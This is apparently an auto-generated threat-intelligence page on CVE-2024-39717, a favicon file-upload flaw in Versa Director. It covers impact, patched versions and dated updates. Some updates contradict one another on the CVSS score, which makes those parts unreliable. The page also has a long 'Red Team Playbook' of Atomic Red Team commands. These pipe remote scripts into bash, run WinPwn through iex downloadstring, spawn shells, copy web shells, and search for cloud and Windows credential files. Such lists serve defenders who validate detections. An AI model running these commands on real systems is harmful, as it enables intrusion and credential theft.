CVE-2024-39717
Overview
This vulnerability is an insecure file upload flaw in the Versa Director GUI component, specifically within the 'Change Favicon' feature. The root cause lies in insufficient validation of uploaded files, allowing malicious files with a .png extension to bypass file type restrictions. This issue affects the administrative interface accessible only to users with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin privileges.
Vulnerability Description
The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin. (Tenant level users do not have this privilege). The “Change Favicon” (Favorite Icon) option can be mis-used to upload a malicious file ending with .png extension to masquerade as image file. This is possible only after a user with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin has successfully authenticated and logged in.
Impact
An attacker with administrative-level credentials can exploit this vulnerability to upload malicious files disguised as favicon images, potentially leading to arbitrary code execution or unauthorized system manipulation within the Versa Director environment. This requires prior authentication with high-privilege roles, restricting exploitation to trusted users or compromised admin accounts. Successful exploitation may result in full system compromise, data exposure, or disruption of network management operations.
Solution
Versa Networks has released security updates addressing this vulnerability in Versa Director versions 22.1.4 and later. Administrators should upgrade affected installations from versions 21.2.2 through 22.1.3 to the latest patched release. Detailed patch instructions and advisory information are available at the vendor's security bulletin: https://versa-networks.com/blog/versa-security-bulletin-update-on-cve-2024-39717-versa-director-dangerous-file-type-upload-vulnerability/
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Versa Director GUI revolves around the ability for users with elevated privileges, specifically Provider-Data-Center-Admin or Provider-Data-Center-System-Admin, to upload files under the guise of image files. This functionality, intended to allow customization of the user interface through the “Change Favicon” option, can be exploited to upload malicious files masquerading as legitimate PNG images. The flaw arises from inadequate validation of the uploaded file type, allowing an attacker to bypass security measures and execute arbitrary code on the server. This could lead to significant security breaches, including unauthorized access to sensitive data or the execution of harmful scripts.
Exploitation of this vulnerability typically requires an attacker to first gain access to an account with the necessary administrative privileges. This could be achieved through various means, such as phishing attacks, credential stuffing, or exploiting other vulnerabilities within the system. Once access is obtained, the attacker can upload a malicious file that could execute code on the server, potentially allowing for further exploitation of the network or the installation of backdoors for persistent access. The risk is compounded by the fact that such an attack could be executed without immediate detection, as the malicious file would appear to be a benign image to casual observers.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the affected versions of the Versa Director software. An attacker successfully exploiting this flaw could gain control over critical infrastructure, leading to data breaches, loss of customer trust, and potential regulatory penalties. The business risks extend beyond immediate financial losses; they include long-term reputational damage and the potential for operational disruptions. Organizations that fail to address this vulnerability may find themselves at a competitive disadvantage, particularly in industries where data security is paramount.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. This includes conducting regular security assessments and penetration testing to identify potential weaknesses in their systems. Additionally, organizations should enforce strict access controls, ensuring that only necessary personnel have administrative privileges. File upload functionalities should be fortified with robust validation mechanisms to ensure that only legitimate file types are accepted, and any uploaded files should be scanned for malicious content. Implementing a web application firewall can also help in detecting and blocking malicious uploads before they reach the server.
In conclusion, the vulnerability present in the Versa Director GUI poses a serious threat to organizations utilizing the affected software versions. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare their defenses against such threats. Proactive measures, including stringent access controls and enhanced file validation, are essential to mitigate the risks associated with this vulnerability and protect organizational assets from exploitation.
Recent developments indicate a nuanced shift in the risk profile of CVE-2024-39717. While the CVSS score has been adjusted downward from 7.2 to 6.6, reflecting a reassessment of the vulnerability’s inherent severity, our telemetry reveals a modest but consistent increase in exploitation attempts, as evidenced by a 15.4% rise in the Exploit Prediction Scoring System (EPSS). This divergence underscores that, despite a slightly reduced technical severity, adversaries are actively leveraging new proof-of-concept tools to exploit the vulnerability, expanding the attack surface. The inclusion of this CVE in the Known Exploited Vulnerabilities (KEV) catalog further elevates its operational relevance, signaling that threat actors are prioritizing it within their campaigns. Our sensors have detected a stable trend in exploitation activity over the past week, indicating sustained adversary interest rather than a transient spike. This persistence, combined with the availability of publicly accessible exploit code and sophisticated visualization of attack chains linked to critical infrastructure compromise, amplifies the potential impact on organizations using Versa Director. Consequently, the threat landscape has evolved to reflect a medium-severity vulnerability with heightened exploitation likelihood, necessitating continued vigilance from defenders.
Update 2 — June 09, 2026
CSURFACE threat intelligence has identified a revision in the CVSS score for CVE-2024-39717, elevating it from 6.6 to 7.2, reflecting a reassessment of the vulnerability’s impact and exploitability. This adjustment aligns with the recent inclusion of the vulnerability in the Known Exploited Vulnerabilities (KEV) catalog, underscoring its recognition as a credible threat vector. Although ransomware usage linked to this vulnerability remains unconfirmed, the availability of new proof-of-concept exploits and sophisticated attack chain visualizations has heightened the operational awareness of threat actors’ capabilities. Our telemetry indicates a stable exploitation trend without rapid escalation, suggesting persistent adversary interest rather than opportunistic bursts. This evolution in the threat landscape signifies an increased likelihood of targeted exploitation against Versa Director environments, particularly given the administrative privilege requirements for exploitation. Consequently, the risk profile has shifted to a higher severity tier, necessitating enhanced monitoring and prioritization within defensive postures.
Update 3 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-39717, with telemetry indicating a significant uptick in attempts to exploit the Versa Director GUI vulnerability. This surge underscores an increased operational interest by threat actors in leveraging the malicious file upload vector, particularly given the administrative privilege constraints required for exploitation. Concurrently, new proof-of-concept exploits have surfaced publicly, enhancing adversaries’ capability to weaponize this vulnerability more efficiently. Although the EPSS score remains stable, the qualitative increase in exploitation attempts signals a shift from sporadic probing to more persistent targeting efforts. This evolution elevates the threat level, emphasizing the necessity for defenders to heighten vigilance around administrative access controls and monitoring of anomalous file upload behaviors within Versa Director environments.
Update 4 — July 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-39717, with a notable surge in adversary activity leveraging the vulnerability’s file upload weakness. This increase coincides with the public release of additional proof-of-concept exploits, which have enhanced attacker capabilities to bypass privilege restrictions more efficiently. Our telemetry indicates that threat actors are shifting from opportunistic probing to more sustained and targeted campaigns, potentially aiming at critical infrastructure sectors as suggested by emerging attack chain visualizations linked to advanced persistent threat groups. Although the EPSS score remains stable, the qualitative rise in exploitation frequency and sophistication elevates the overall threat level, underscoring a growing operational interest in this vulnerability. Defenders should be aware that this trend reflects an expanding attack surface and increased likelihood of successful compromise in environments where administrative controls are insufficiently enforced.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Versa-Networks | Versa Director | 21.2.2 |
cpe:2.3:a:versa-networks:versa_director:21.2.2:*:*:*:*:*:*:*
|
|
|
Versa-Networks | Versa Director | 21.2.3 |
cpe:2.3:a:versa-networks:versa_director:21.2.3:*:*:*:*:*:*:*
|
|
|
Versa-Networks | Versa Director | 22.1.1 |
cpe:2.3:a:versa-networks:versa_director:22.1.1:*:*:*:*:*:*:*
|
|
|
Versa-Networks | Versa Director | 22.1.2 |
cpe:2.3:a:versa-networks:versa_director:22.1.2:*:*:*:*:*:*:*
|
|
|
Versa-Networks | Versa Director | 22.1.3 |
cpe:2.3:a:versa-networks:versa_director:22.1.3:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ahays248/VT_Viz
Interactive 3D visualization of China's Volt Typhoon APT attacking US critical infrastructure. Shows real 72-hour attack...
|
ahays248 | 1 | 0 | 2025-09-02 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-39717 |
| versa-networks.com |
GitHub CVE
|
https://versa-networks.com/blog/versa-security-bulletin-update-on-cve-2024-39717-versa-director-dangerous-file-type-upload-vulnerability/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-39717 |